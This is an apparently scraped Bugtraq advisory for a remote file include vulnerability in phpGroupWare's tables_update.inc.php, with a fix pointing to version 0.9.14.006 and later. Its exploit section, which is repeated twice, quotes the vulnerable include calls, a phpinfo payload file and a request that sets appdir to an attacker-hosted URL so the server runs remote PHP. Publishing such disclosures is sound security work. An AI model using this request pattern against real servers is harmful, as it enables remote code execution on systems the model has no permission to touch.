PHPGroupWare Tables_Update.Inc.PHP Remote File Include Vulnerability
BID:12074
Info
PHPGroupWare Tables_Update.Inc.PHP Remote File Include Vulnerability
| Bugtraq ID: | 12074 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 27 2004 12:00AM |
| Updated: | Jan 27 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Cedric Cochin <mailto:[email protected]>. |
| Vulnerable: |
PHPGroupWare PHPGroupWare 0.9.14 .005 PHPGroupWare PHPGroupWare 0.9.14 .003 |
| Not Vulnerable: |
PHPGroupWare PHPGroupWare 0.9.14 .006 |
Discussion
PHPGroupWare Tables_Update.Inc.PHP Remote File Include Vulnerability
phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server.
phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server.
Exploit / POC
PHPGroupWare Tables_Update.Inc.PHP Remote File Include Vulnerability
No exploit is required and the following example is available:
The tables_update.inc.php script contains the following include calls:
/* Include older phpGroupWare update support */
include($appdir . 'tables_update_0_9_9.inc.php');
include($appdir . 'tables_update_0_9_10.inc.php');
include($appdir . 'tables_update_0_9_12.inc.php');
For example supplying the following file:
tables_update_0_9_9.inc.php = <?php print "<?php phpinfo();?>" ;?>
The following request will execute the phpinfo() command on the vulnerable target:
http://[victim]/[phpgroupware_directory]/phpgwapi/setup/tables_update.inc.php?appdir=http://[attacker]/
No exploit is required and the following example is available:
The tables_update.inc.php script contains the following include calls:
/* Include older phpGroupWare update support */
include($appdir . 'tables_update_0_9_9.inc.php');
include($appdir . 'tables_update_0_9_10.inc.php');
include($appdir . 'tables_update_0_9_12.inc.php');
For example supplying the following file:
tables_update_0_9_9.inc.php = <?php print "<?php phpinfo();?>" ;?>
The following request will execute the phpinfo() command on the vulnerable target:
http://[victim]/[phpgroupware_directory]/phpgwapi/setup/tables_update.inc.php?appdir=http://[attacker]/
Solution / Fix
PHPGroupWare Tables_Update.Inc.PHP Remote File Include Vulnerability
Solution:
The vendor has addressed this issue in phpGroupWare 0.9.14.006 and later.
PHPGroupWare PHPGroupWare 0.9.14 .003
PHPGroupWare PHPGroupWare 0.9.14 .005
Solution:
The vendor has addressed this issue in phpGroupWare 0.9.14.006 and later.
PHPGroupWare PHPGroupWare 0.9.14 .003
-
PHPGroupWare phpgroupware-0.9.14.007.tar.gz
http://prdownloads.sourceforge.net/phpgroupware/phpgroupware-0.9.14.00 7.tar.gz?download
PHPGroupWare PHPGroupWare 0.9.14 .005
-
PHPGroupWare phpgroupware-0.9.14.007.tar.gz
http://prdownloads.sourceforge.net/phpgroupware/phpgroupware-0.9.14.00 7.tar.gz?download
References
PHPGroupWare Tables_Update.Inc.PHP Remote File Include Vulnerability
References:
References:
- Changelog (PHPGroupWare)
- PHPGroupWare Homepage (PHPGroupWare)